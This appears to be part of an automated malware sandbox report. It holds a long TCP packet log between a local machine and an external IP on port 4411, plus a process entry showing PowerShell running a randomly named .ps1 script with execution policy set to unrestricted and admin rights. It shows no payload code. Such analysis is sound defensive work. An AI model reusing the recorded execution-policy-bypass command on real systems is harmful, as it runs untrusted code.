                                Dec 18, 2024 08:16:54.409287930 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.480015993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.528961897 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.529083967 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.596301079 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.648689985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.648809910 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.670897961 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.752336979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.787277937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.787487030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.949203014 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.949423075 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:55.069746017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:55.784014940 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:55.903759956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:55.971424103 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.091345072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.112101078 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.216871023 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.231717110 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.231810093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.351308107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.408744097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.411401033 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.531789064 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.645107985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.646506071 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.769304037 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.409894943 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:58.529447079 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.529565096 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:58.649218082 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.870136976 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.049870968 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.061120987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.065875053 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.185307026 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.206286907 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.252048969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.325901985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.325992107 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.445509911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.445561886 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.565068960 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.668998957 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.669934034 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.789355040 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.789428949 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.909122944 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.958950996 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.959986925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:00.079488993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:00.273669004 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:00.274717093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:00.394208908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.236984968 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.356506109 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.356587887 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.476097107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.476144075 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.595721006 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.643399954 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.670111895 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.762830973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.762882948 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.861176014 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.861248970 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.882354975 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.882405996 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.953979969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.954035044 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.980761051 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.980808020 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:02.002038956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:02.073575020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.304627895 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:28.383573055 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.424187899 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.424325943 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:28.545783043 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.545914888 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:28.636090994 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.665440083 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.693934917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:28.815572977 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.826387882 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:28.827347994 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:28.988903999 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.006690979 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.007625103 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.127172947 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.127279997 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.138145924 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.138349056 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.257919073 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.257997036 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.425215960 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.425288916 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.545109987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.545166016 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.602159023 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.664808989 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.664860964 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:29.784554958 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.893022060 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:29.939920902 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:30.084271908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.168343067 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:30.275332928 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.275491953 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:30.287868023 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.395014048 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.395129919 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:30.515410900 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.847549915 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:30.941906929 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.968626976 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:30.969041109 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:31.088530064 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.378355026 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:31.499033928 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.561427116 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.562417030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:31.683125973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.705957890 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:31.811433077 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.825525999 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.825731039 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:31.945507050 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:31.945600986 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:32.065443993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.169078112 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.170097113 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:32.290483952 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.362202883 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:32.466177940 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.482598066 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.482666016 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:32.602134943 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.657054901 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.661946058 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:32.781814098 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.888073921 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:32.899698019 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.019201040 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.409218073 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.528794050 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.528862000 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.648637056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.674726963 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.794238091 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.794290066 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.842355013 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.913806915 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:33.913860083 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:33.985560894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.033334970 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.033387899 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.153350115 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.153482914 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.176810026 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.176861048 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.297450066 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.298070908 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.344357014 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.369267941 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.370054007 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.461993933 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.462122917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.487531900 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.489530087 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.489622116 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.581576109 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.610002041 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.660959005 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.661087036 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.772953033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.780649900 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.782107115 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:34.902833939 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.971946001 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:34.973565102 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:35.093055010 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.377948046 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:35.497539043 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.497596979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:35.617501020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.617563963 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:35.738018990 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.814048052 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.814970016 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:35.934743881 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:35.987227917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.004018068 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.094698906 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.107177019 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.107234001 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.126008987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.252448082 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.273184061 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.274058104 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.298213959 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.393574953 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.393762112 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.489311934 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.513855934 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.516082048 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.584702969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.635579109 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:36.635730028 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:36.755428076 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:38.675014973 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:38.794787884 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:38.794864893 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:38.914576054 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.420305967 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.421288967 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:39.541970015 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.580893993 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:39.613976002 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.701427937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.701495886 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:39.821866035 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:39.821924925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:39.941541910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.022119045 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.022972107 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:40.142648935 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.174690008 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:40.294388056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.319555044 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.327332020 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:40.489726067 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.627224922 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:40.671099901 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:40.790575027 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:41.346930027 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:41.466644049 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:41.596617937 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:41.716351032 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:41.780411005 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:41.781321049 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:41.901144028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.030026913 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.030867100 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:42.150579929 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.221935987 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:42.341778994 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.654781103 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.655668974 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:42.775352955 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:42.816005945 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:42.935563087 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:43.259093046 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:43.260221004 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:43.380161047 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.331104040 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.450634956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.450704098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.570314884 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.612200022 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.731785059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.731854916 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.764249086 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.888005018 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.896894932 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:45.897011042 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:45.923230886 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.018229961 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.018326044 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.116234064 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.116316080 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.137944937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.138020039 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.207798004 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.207916975 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.235889912 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.235975981 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.257738113 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.327397108 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.355577946 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.427165031 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.430778027 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.518640995 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.525991917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.550301075 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.645708084 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.645853996 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.660408020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.709757090 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.711018085 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.812808990 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.862469912 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.891854048 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.891938925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:46.982045889 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:46.982239008 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:47.011806965 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.083075047 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.101917028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.102140903 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:47.221755981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.471718073 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:47.591694117 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.591773987 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:47.711414099 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.905592918 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:47.906861067 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.026376009 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.112272978 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.140266895 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.231676102 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.231733084 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.351237059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.351347923 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.470899105 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.545135021 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.546132088 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.665910959 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.666116953 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.786005974 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.833926916 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:48.837986946 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:48.957607031 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.024483919 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.028773069 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.148284912 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.148942947 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.149988890 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.312733889 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.409074068 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.529481888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.529572964 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.650058031 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.650119066 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.769663095 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.769745111 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.842292070 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.842365026 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.889324903 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:49.889401913 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:49.961961985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.008928061 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.009041071 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:50.033437967 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.091159105 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:50.153354883 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.153495073 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:50.316735983 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.316894054 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:50.319789886 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:50.436593056 CET44114970892.255.57.155192.168.2.8

                                Target ID:0
                                Start time:02:15:20
                                Start date:18/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
